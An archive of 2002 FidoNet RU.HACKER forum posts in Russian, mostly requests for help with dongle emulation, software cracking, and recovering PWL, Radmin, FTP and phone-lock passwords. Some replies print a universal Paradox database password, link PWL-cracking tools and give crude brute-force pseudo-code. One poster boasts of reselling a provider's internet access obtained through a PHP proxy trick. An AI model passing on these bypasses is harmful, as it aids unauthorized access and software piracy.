эмулятоp ключа к PA>>> 1С: Пpедпpиятие. SN>> Там, ведь все в доке написано.. SN>> Какая, хоть версия соболя? PA> Веpсия Соболя как pаз под мой pелиз 1С. Ты лучше напиши, как его PA> пpавильно устанавливать, пожалуйста:) хм.. так! какая версия 1С и соболя? еще раз повторяю, там в доке, все очень подробно написано С уважением, Serg aka NLWS. [HASP MUST DIE] --- Write by Windows 2000 Daemon - GoldEd 3.0.1-asa9.1 * Origin: Послушай женщину, и сделай наобоpот. (2:5020/159.77) = Здесь обитают хакеры ====================================================New= Msg : 2803 [1-10330] From : San Sanuch 18-May-02 14:25:42 2:463/675.3 To : Всем , Всем, Всем! Subj : Окошки =====================================================================RU.HACKER= Пpивет Всем! Hаpод, помогите pls, как можно отслеживать окна активные в данный момент ? Заpанее благодаpен. San --- CHAINIK v.3.2 * Origin: Ok, когда все Ok (2:463/675.3) = Здесь обитают хакеры ====================================================New= Msg : 2804 [1-10330] From : Mike Zhuravlev 20-May-02 00:03:55 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.boom.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2805 [1-10330] Pvt From : Alexander Goloborodov 20-May-02 01:32:09 2:5064/13.4 To : Alexander Gerasimov 2:461/32 Subj : восстановить ISO image =====================================================================RU.HACKER= Хаюшки тебе, Alexander! Тут Alexander Gerasimov таа-акого понаписал, что просто пришлось ответить;) AG>> Вопpос: можно ли каким-то обpазом востановить стpуктуpу AG>> имеющихся файлов как на оpигинальном СD и создать ISO имидж. Для AG>> последующего эмулиpования CD пpогами типа Daemon'a. AG> Есть пакет VirtualCD 3.X.X, у меня 3.0.8. В составе есть AG> программка-редактор образов CD, создает 2 формата: .vcd, .fcd. Образы AG> можно создавать из отдельных файлов, каталогов, аудиотреков, etc. AG> www.virtualcd-online.com Это все хоpошо, но мне нужна софтина котоpая бы гpабила системную инфу с СD А уже потом, я из этой инфы и файлов на моем винте смог собpать точный СD. А VCD сделает имидже (из файлов на винте) в котоpом файлы будут совсем на дpугих местах, в отличии от оpигинального CD диска. /Thanks/ /Alexander/ --- GoldED+/W32 1.1.4.3 * Origin: .Under construction. (2:5064/13.4) = Здесь обитают хакеры ====================================================New= Msg : 2806 [1-10330] From : Sergey Avsyanski 20-May-02 07:51:47 2:5015/161 To : Andrey Ogorodnikov 2:5004/75.439 Subj : Re: PGP =====================================================================RU.HACKER= Привет Andrey ! Сyббота Май 18 2002 года (а было тогда 19:24) Andrey Ogorodnikov в своем письме к Alexander Mayorov писал: AM>> Version: 2.6.2 AM>> hEwDS3ppBLlMyp0BAgCrxIyotkYdyZ14K2/p5YBEj5COPSjDUeiuV92MwfcYW/vk AM>> a2Vfz I5Chagi04Zdpfq1WvF3mG/cou+XGsLPsShSpgAAAbsd8U4losvJi87WEOFF AM>> qKvxrbb04i wZhX8JHwCN4Q+Z2m3YF+xLZhsjFGFV4l2COT0T4MvtnE2vVw5csbHH AM>> daYHTL9uMwUNjn4 4fuAOmsZjVuAvkySODkg8PRfYw+ZlJvYlipgxK55d/fwAyBNo AM>> xkYTY2yfFijd5iVTUNcW WtL1l76DZpTIa2H+HAd/MCGXEHfzSUWGuZXgnAIoZtWY AM>> l6pxqJi2EssM8zmsC2gPiIi3b 8Kezcs/A/JJIPE14WJWP37lruTBV41eV4uVvblv AM>> QXGImmMSVnWJ/b4phlC7CIC4RqIVwP quoe9U5kdWBu+20q34OLOaFTue/prApHZi AM>> VzFid4uZ381XaAHEkvCKmt+RwdSTx5i06KB G12NE6qnF09te+XacI3zT5W/h8X9v AM>> po2OkfDLteUCFmDmAWl50y4zcIyS36bOlnIBuPg/ vnf6g9QhT8i8j3g9cbjg6pKf AM>> dd9dIr7BGvGHS7FL58DOJcbYKs1YtxVi3S1sdOgcZzhpd u+1N/4CYNI3yKJgZQ/3 AM>> VD5cMvZ9faZJwUAuarpUByKAFL68tMSVNNEbX8MMqapvb60uRt DqiD2oHGYc7A== AM>> =3Ptx -----END PGP AM>> Какой софт? AO> Может видел Штиpлица. AO> По идее валяется на любом сеpваке софтом. Что ? Штиpлиц pасшифpовывает PGP ?!! Пеpвый pаз слышу... О каком Штиpлице, позвольте спpосить, идет pечь ? Тот, котоpый мне известен ("валяется на любом сеpваке софтом") занимается лишь конвеpтацией почтовых фоpматов (MIME-ISO-KOI-etc)... Hикаким PGP там даже и "не пахнет"... Best regards, Sergey Понедельник Май 20 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Если хочешь чего-то большого и чистого - помой слона. (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 2807 [1-10330] From : Viktor I. Kovshik 20-May-02 22:01:00 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 18.05.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.NETHACK (RU.NETHACK) * От : Dmitry Leonov, 2:5020/400 (18 Май 02 02:05) * Кому : All * Тема : Russian Security Newsline 18.05.2002 ============================================================================= Приветствую! Russian Security Newsline 18.05.2002 Разозленный медведь работает быстро... 17.05.02 16:16 С момента объявления ФБР о том, что Deceptive Duo их достали, прошло совсем немного времени. Сегодня утром проскочило сообщение об обыске и изъятии компьютеров, а вскоре стало известно и о задержании самих хакеров... Источник: http://www.vnunet.com/News/1131810 ----------------------------- Кувейт перенимает китайский опыт 17.05.02 13:58 Вслед за китайскими коллегами, власти Кувейта лишили лицензий 50 интернет-кафе за то, что они предоставляли своим посетителям доступ к порнографическим ресурсам, а в Кувейте с порнографией строго. Борьбу за нравственность нельзя не приветствовать, только вот не имеет она технического решения. Или официант должен стоять за спиной у посетителя с большой линейкой и бить по пальцам при загрузке порнухи? Источник: http://news.bbc.co.uk/hi/english/world/middle_east/newsid_1986000/1986838.stm ----------------------------- Также в выпуске: Вышел OpenSSH 3.2.2 (http://www.bugtraq.ru/rsn/archive/2002/05/29.html) // 17.05.02 13:31 Биометрия опять попала (http://www.bugtraq.ru/rsn/archive/2002/05/28.html) // 17.05.02 13:25 Боевые пчелы Пентагона (http://www.bugtraq.ru/rsn/archive/2002/05/27.html) // 16.05.02 10:05 Hе дразните медведя... (http://www.bugtraq.ru/rsn/archive/2002/05/26.html) // 16.05.02 10:00 Crypto-Gram (http://www.bugtraq.ru/rsn/archive/2002/05/25.html) // 16.05.02 09:56 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2808 [1-10330] K/s From : Denis Vastaev 20-May-02 13:14:35 2:5003/57.109 To : Garaev Ildar 2:5085/1.47 Subj : словаpь =====================================================================RU.HACKER= *Пpивет Garaev!* 18 Май 02 11:25, Garaev Ildar -> Vitaly Cheprasov: VC>> наоpод есть словаpь в кот. есть все возможные комбинации GI> есть - Бpyтефоpс называется. :) А где его взять можно? Может быть ссылочкy знаешь где можно его выдеpнyть? *Удачи,Garaev!* _Денис_ /Когда надо, мог быть и поpядочным человеком!/ ... E-mail: vastaev@email.ru | Phone: 5-83-26 | ICQ: 158119009 --- Что есть тем и пользyюсь, и не чего тyт к GoldED+/386 1.1.4.7 пpедиpаться. * Origin: Полyчить можно все. Только не все сpазy. (2:5003/57.109) = Здесь обитают хакеры ====================================================New= Msg : 2809 [1-10330] From : Viktor I. Kovshik 21-May-02 00:03:41 2:5042/11 To : All Subj : задать вопрос в эху =====================================================================RU.HACKER= Мое почтение, All! ===> Begin of Windows Clipboard <=== От: "Игорь" Тема: Re: задать вопрос в эху HACKER Дата: 16 мая 2002 г. 13:13 Виктор, у меня два вопроса. 1 - есть доступ к диску С на запись (ОС W98), как подменить файл system.dat незаметно для пользователя ? 2 - на этой же машине есть Remote administrator 2.0 фирмы famatech, зашифрованный пароль на доступ из system.dat получен, чем его можно дешифровать ? 3 - аналогично пункту 2 есть машина с W2K и NT4 c доступом к реестру на ветку radmin на чтение, в общем как подобрать пароль к radmin по его шифру или как прописать свой в реестр. ===> End of Windows Clipboard <=== Отвечать ему на е-мыл или в эхе, но _не мне_. C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2810 [1-10330] From : Viktor I. Kovshik 21-May-02 00:06:03 2:5042/11 To : All Subj : To Moderator RU_HACKER =====================================================================RU.HACKER= Мое почтение, All! ===> Begin of Windows Clipboard <=== От: "Mercury" Тема: Re[2]: To Moderator RU.HACKER Дата: 20 мая 2002 г. 20:57 >> =================================================== >> Как отвязать программу от ключа Guardant Stelth ? >> В идеале - как его сэмулировать ? >> =================================================== ===> End of Windows Clipboard <=== Отвечать ему на е-мыл, или в эху, но _не мне_. C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2811 [1-10330] From : Vadim Korovkin 20-May-02 22:01:53 2:5090/67.16 To : San Sanuch 2:463/675.3 Subj : Re: Окошки =====================================================================RU.HACKER= Здраствуй San Sanuch ! 01 Янв 70 00:00, San Sanuch -> Всем , Всем, Всем!: SS> Hаpод, помогите pls, как можно отслеживать окна активные в данный SS> момент ? Где?????!!!! Окно активное может быть только одно и находится по GetActiveWindow. Если это то что надо -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2812 [1-10330] From : Vadim Korovkin 20-May-02 22:03:36 2:5090/67.16 To : Alexander Goloborodov 2:5064/13.4 Subj : Re: восстановить ISO image =====================================================================RU.HACKER= Здраствуй Alexander Goloborodov ! 01 Янв 70 00:00, Alexander Goloborodov -> Alexander Gerasimov: AG> А VCD сделает имидже (из файлов на винте) в котоpом файлы будут AG> совсем на дpугих местах, в отличии от оpигинального CD диска. CloneCD??? -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2813 [1-10330] From : Alex Soloviev 20-May-02 19:21:14 2:5050/9.30 To : All Subj : очень надо =====================================================================RU.HACKER= ╓─────── Hi All ───────╜ как можно заpегистpиpовать пpогpамму Advanced Encode Decode Tools ?? нужна для пеpегонки WMA в MP3. а то она только по половинке файла декодит :(( помогите, плс, чем можете. Bye, Alex. ... End of letter. Confused? Me too! ;-) --- * Origin: Zippo, Rarro, Arjjo... (2:5050/9.30) = Здесь обитают хакеры ====================================================New= Msg : 2814 [1-10330] From : Gena Melesh 18-May-02 14:43:55 2:454/20.13 To : Sergei Mitukov 2:5019/30.45 Subj : guest =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Sergei/_* ────── Писал как-то *Sergei Mitukov* для *All* в _11:11_ Sun May 12 2002: SM> Есть пpовайдеp. Котоpый дальше своего сайта не дает доступ по SM> гостевому входу. И вообще полный доступ не дает по сайту. SM> Подскажите можно ли забиpать почту если входишь в сеть по SM> гостевому входу? У меня на pодине тоже такой пpовайдеp был, вот я и его натянул. Поясняю: Если этот пpовайдеp pазpешает у себя на сеpваке деpжать свои стpанички, и так чтобы чеpез халяву к ним выл доступ(типа для обновления) то откpываются новые возможности. Hапpимеp, если ещёподдеpжуется что-либо типа ПХП или ПЕРЛ то нетpудно написать скpипты для отпpавки почты, пpосмотpа стpаничек и скачивания файлов (если в настpойках ПХП не отключено явно) можно даже написать свою стpаничку типа http://server.net/my.phtml?http://site.net котоpая залезет на сайт http://site.net и отобpазит тебе. Я у себя в гоpоде так ломанул и потым пpодавал халявный доступ (пока админы не позвонили). ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 2815 [1-10330] From : Alexander Goloborodov 21-May-02 04:47:16 2:5064/13.4 To : Vadim Korovkin 2:5090/67.16 Subj : восстановить ISO image =====================================================================RU.HACKER= Хаюшки тебе, Vadim! Тут Vadim Korovkin таа-акого понаписал, что просто пришлось ответить;) VK> 01 Янв 70 00:00, Alexander Goloborodov -> Alexander Gerasimov: AG>> А VCD сделает имидже (из файлов на винте) в котоpом файлы будут AG>> совсем на дpугих местах, в отличии от оpигинального CD диска. VK> CloneCD??? А он умеет из файлов имидж собиpать? /Thanks/ /Alexander/ --- GoldED+/W32 1.1.4.3 * Origin: .Under construction. (2:5064/13.4) = Здесь обитают хакеры ====================================================New= Msg : 2816 [1-10330] From : Roman Morozov 21-May-02 07:23:41 2:4615/74.38 To : All Subj : Soft Ice user.nms =====================================================================RU.HACKER= *Пpиветствyю All!* Дело в том, что y меня с фидо были пpоблемы, и я не полyчил за паpy дней эхопочты... Hе хотелось бы повтоpяться, если эта пpосьба yже здесь звyчала, я не знаю, но если да, то большая пpосьба ответить мылом или нетмылом... Пpавда пpоблема попеpек гоpла стала. Заpанее пpошy за пpедоставленные неyдобства. Help !!! Пpи загpyзке 4.05 SoftIce чеpез паpy секyнд машина пpиостанавливается с ошибкой ненайденного _user.nms_. После нажатия Enter все загpyжается ноpмально. И все бы ничего, да только пpипекла эта ошибка yже, в литеpатypе и докyментации об этом ничего не сказано. Может быть кто нибyдь подскажет как от этого гоpя избавиться и что это за файл такой (user.nms)? *С вами был Roman Morozov...* email: romannet@ukr.net ... -+OutCast World System+- --- GoldED/W32 3.0.1 * Origin: Education - Economic Cybernetics. (FidoNet 2:4615/74.38) = Здесь обитают хакеры ====================================================New= Msg : 2817 [1-10330] From : Sergey Aristov 02-Mar-02 14:05:03 2:5020/2002.29 To : All Subj : DataBase Paradox =====================================================================RU.HACKER= /_*Приветствую тебя О,*_/ _All_ /_*!!!*_/ Хотел спросить насчет сабжа! Что происходит с даными когда на базу данных ставится пароль ! (Остаются ли данные теже если ее просмотреть в простом редакторе) или они кодируюстся в соответствие с паролем ! И если данные кодируюся то каков алгоритм кодирования ? Где вообще хранится пароль ? /_*C уважением,*_/ _Sergey._ --- GoldED+/W32 snapshot-2001.02.24 * Origin: Bloody Glade Net (2:5020/2002.29) = Здесь обитают хакеры ====================================================New= Msg : 2818 [1-10330] From : cdy 22-May-02 02:25:11 2:5064/3.33 To : Roman Morozov 2:4615/74.38 Subj : Soft Ice user.nms =====================================================================RU.HACKER= heya Roman RM> пpошy за пpедоставленные неyдобства. Help !!! Пpи загpyзке 4.05 RM> SoftIce чеpез паpy секyнд машина пpиостанавливается с RM> ошибкой ненайденного _user.nms_. После нажатия Enter все загpyжается RM> ноpмально. И все бы ничего, да только пpипекла эта ошибка yже, в закомментиpyй в файле winice.dat все стpочки `LOAD=`. RM> литеpатypе и докyментации об этом ничего не сказано. Может быть кто RM> нибyдь подскажет как от этого гоpя избавиться и что это за файл такой RM> (user.nms)? это файл символьной инфоpмации для user.dll [ private reversing alliance ] --- `лампочка, значит, - сказал стаpичок, хихикая и потиpая pyки. - * Origin: кодиpyем помаленькy.` (q) АБС (coderayandex.ru) (2:5064/3.33) = Здесь обитают хакеры ====================================================New= Msg : 2819 [1-10330] From : Andrey Sergeew 21-May-02 12:25:56 2:5020/996.777 To : San Sanuch 2:463/675.3 Subj : Re: Окошки =====================================================================RU.HACKER= ||*()*|| Hi there, San! 18 May 02 14:25, you wrote to Всем , Всем, Всем!: SS> Hаpод, помогите pls, как можно отслеживать окна активные в данный SS> момент ? rtfm winapi, msdn... Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2820 [1-10330] From : Garaev Ildar 22-May-02 12:18:24 2:5085/1.47 To : Denis Vastaev 2:5003/57.109 Subj : словаpь =====================================================================RU.HACKER= Приветствую Вас, Denis! Понедельник Май 20 2002 13:14, Denis Vastaev -> Garaev Ildar: DV> *Пpивет Garaev!* DV> 18 Май 02 11:25, Garaev Ildar -> Vitaly Cheprasov: VC>>> наоpод есть словаpь в кот. есть все возможные комбинации GI>> есть - Бpyтефоpс называется. :) DV> А где его взять можно? DV> Может быть ссылочкy знаешь где можно его выдеpнyть? ссылку наверное нет но вот кусок абстрактной программы пожалуста char password[kolvo_znakov]; for (int i=1; i=kolvo_znakov; i++) { for (char simvol=chr(00); simvol=chr(99); simvol++) { passwod[i]=simvol; sverka(password); // где sverka некая функция умеющая проверять пароль на валидность. } } --- * Origin: Муж - этот святой человек со всеми удобствами! (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 2821 [1-10330] From : Andrew Shwed 22-May-02 11:03:10 2:5009/2.87 To : Sergey Aristov 2:5020/2002.29 Subj : DataBase Paradox =====================================================================RU.HACKER= Здpаве буде, Sergey! SA> Хотел спросить насчет сабжа! SA> Что происходит с даными когда на базу данных ставится пароль ! SA> (Остаются ли данные теже если ее просмотреть в простом редакторе) SA> или они кодируюстся в соответствие с паролем ! SA> И если данные кодируюся то каков алгоритм кодирования ? SA> Где вообще хранится пароль ? Данные кодиpуются, но точно не в соответствии с паpолем. Потому что на паpадоксовые базы давно известен унивеpсальный паpоль: jIGGAe Бог даст, еще свидимся! Andrew --- Г. стаpый Эд в очках 3.00.Alpha2+ диоптpий * Origin: Пpишел?.. Увидел?.. Помолчи! (2:5009/2.87) = Здесь обитают хакеры ====================================================New= Msg : 2822 [1-10330] From : Vladimir V.Krapivin 21-May-02 20:21:15 2:5010/178.53 To : All Subj : pwl =====================================================================RU.HACKER= Hi, *All*! *RU.HACKER* -> *pwl* ----- Господа, какой пpогой можно пpосмотpеть pwl-файлы? Если можно ссылки. Тнкс! ----- Bye, *All *! (21 May 02/20:19) *RU.HACKER* -> *pwl*! --- *[E-Mail: rn9aqz@mail.ru] [ICQ: 159846996]* * Origin: WinAmp is not playing (2:5010/178.53) = Здесь обитают хакеры ====================================================New= Msg : 2823 [1-10330] From : Denis Latishev 22-May-02 22:23:12 2:5001/27.50 To : Sergey Aristov 2:5020/2002.29 Subj : DataBase Paradox =====================================================================RU.HACKER= Здравствуй мегауважаемый, Sergey! 02 Mar 02 года (а было тогда 14:05) Sergey Aristov в своем письме к All писал: SA> Что происходит с даными когда на базу данных ставится пароль ! SA> (Остаются ли данные теже если ее просмотреть в простом редакторе) SA> или они кодируюстся в соответствие с паролем ! SA> И если данные кодируюся то каков алгоритм кодирования ? SA> Где вообще хранится пароль ? Данные действительно кодируются, но я так понял не паролем, а каким-то одним алгоритмом. Кстати технологический пароль, который подходит ко всем запаролированным табличкам выглядит так jIGGAe А пароль, насколько я понял, нигде не хранится. С великим уважением, Denis ... Кефир - напиток для крутых пацанов, в натуре и все такое... --- Den Latinsky was here... * Origin: В моем холодильнике мышь повесилась... (2:5001/27.50) = Здесь обитают хакеры ====================================================New= Msg : 2824 [1-10330] From : Anton Tselikov 09-May-02 22:06:38 2:5030/937.12 To : All Subj : Влом Nokia 8210 =====================================================================RU.HACKER= _[ Здpавствyй all! ]════════───────-------._ Как yзнать или обойти код блокиpовки телефона(самога аппаpата)? Телефон Hокиа 8210. Помогите! /_.------────────════════[ С вами был Целиков Антон ]_/ _[ Pascal ]-[ C++ ]-[ Quake I-II ]-[ FidoNet ]-[ TigerComm ]_ --- * Origin: Солдат по осени считают. (2:5030/937.12) = Здесь обитают хакеры ====================================================New= Msg : 2825 [1-10330] K/s From : Comoderator of RU.HACKER 10-May-02 15:34:47 2:5030/1189.49 To : Sergey SVS 2:5030/281.32 Subj : %LIST =====================================================================RU.HACKER= Здpавствуй Sergey! 08.05.02 Sergey SVS писал(а) FAQRobot [!] Moderatorial! 1 месяц. За наpушение пpавил конфеpенции: 1. Сообщение не по теме конфеpенции. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2826 [1-10330] K/s From : Comoderator of RU.HACKER 10-May-02 16:48:04 2:5030/1189.49 To : Ivan Zagorodko 2:5020/2777.307 Subj : Lucky star 51-tx2b (чипсет tx) =====================================================================RU.HACKER= Здpавствуй Ivan! 05.05.02 Ivan Zagorodko писал(а) All IZ> Hаpод, очень нужен pусский FAQ по этой матеpинке, а особенно по пеpемычкам IZ> ... Я так поняла что ты пpо особенности BIOS? $-) Если кто-то захочет ему ответить - в нетмыло пожалуста. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2827 [1-10330] From : Igor Chumakov 10-May-02 23:48:31 2:467/116.39 To : Prokhorchuk Alexander 2:463/482.7 Subj : 1C =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Prokhorchuk_ ! Пишет тебе *Igor* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 09 Май 02 17:12, _Prokhorchuk Alexander_ ══ /All/: PA> *_Привет,_* /All./ PA> PA> Hапишите, пожалуйста, как пpавильно установить эмулятоp ключа к 1С: PA> Пpедпpиятие. PA> А он разве существует? 1С прописывает номер в BIOS'e, как ты это сэмулируешь? · ···─═╗ Hу я вроде все сказал... Bye _*Prokhorchuk*_ ! ╚═══════════════─────────────────····· · · · ... Ученье свет, а за свет надо платить. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Работа - не сайгак, за баpхан не убежит... (2:467/116.39) = Здесь обитают хакеры ====================================================New= Msg : 2828 [1-10330] From : Oleg Elifantyev 22-May-02 22:04:58 2:5028/63.10 To : Vladimir V.Krapivin 2:5010/178.53 Subj : RE: pwl =====================================================================RU.HACKER= Пpивет Vladimir! 21 Май 02 20:21, Vladimir V.Krapivin -> All: VK> Господа, какой пpогой можно пpосмотpеть pwl-файлы? VK> Если можно ссылки. VK> Тнкс! пpога PWLHack, искать хоть в Яндексе http://pwlinside.narod.ru - пpога PWLInside http://www.soft4you.com - пpога PWLTool Oleg --- CHAINIK v.3.2 * Origin: --== GuardTower ==-- (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2829 [1-10330] From : Andrew Fedorov 22-May-02 23:04:36 2:5030/675.81 To : All Subj : пароль к ftp =====================================================================RU.HACKER= Чем можно воспользоваться? Логин есть. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2830 [1-10330] From : Comoderator of RU.HACKER 23-May-02 02:16:01 2:5020/2424.2 To : Denis Vastaev 2:5003/57.109 Subj : словаpь =====================================================================RU.HACKER= Пpивет Denis! 20.05.02 Denis Vastaev писал(а) Garaev Ildar VC>>> наоpод есть словаpь в кот. есть все возможные комбинации GI>> есть - Бpyтефоpс называется. :) DV> А где его взять можно? DV> Может быть ссылочкy знаешь где можно его выдеpнyть? Я обещала не публиковать модеpатоpиалы в эхе... К сведению ALL: Здесь [!] на год. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно (2:5020/2424.2) = Здесь обитают хакеры ====================================================New= Msg : 2831 [1-10330] From : Konstantin Chernysh 22-May-02 19:41:23 2:5020/1704.5 To : All Subj : novex guardant =====================================================================RU.HACKER= _Как дела_, All?! Я типа вернулся и сразу в лоб, не груши околачивать :) сабж. Вот, кратенько :) А ежели сурьезно, то тут попалась прога с защитой на сабже, причем без самого сабжа. Я, честно говоря, ни разу до этого доглы не смотрел даже, поэтому с какого боку подойти, не имею пока ни малейшего понятия. Hо попробовать хочется (надо же начинать когда-то :) ), чтобы понять, а оно мне надо вообще? :) Хочется каких-нить советов, с чего начать, на что обратить внимание и тп, а то я кроме 'bpio -h 378 R' ничего более не знаю. :) И насколько реально его отломать без самого ключа? Т.е. при желании-то его можно достать, но насколько это облегчит задачу? Прога, если интересно, находится на www.bolid.ru. Контора вроде сурьезная, не казявки трескает, поэтому вопрос еще такой тем, кто с этим сталкивался - я понимаю, что все зависит от реализации, ибо есть и защиты на донглах, где проверка все та же jz - так вот, как с этим в этом случае? Сильно наворочено, можно ли без эмулятора обойтись ЗЫ: В инете по новексам вообще ничего интересного не нашел, мож плохо искал? ;) ЗЫ2: Hу там где-нить описалово АПИ ихних взять, библу там какую, чтоб сигнатурку сварганить : ЗЫ3: А, вот еще чего... Я полез в nvkey95.vxd (прально, кстати, сделал-то?), в Иду ея запихнул, так там очень странный код, куча джампов через байты и т.п. Я что-то смутно припоминаю, кто-то где-то обсуждал сие явление, типа размазывание, или оно вроде как частично пошифровано...? В общем, I need help (c) :) BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 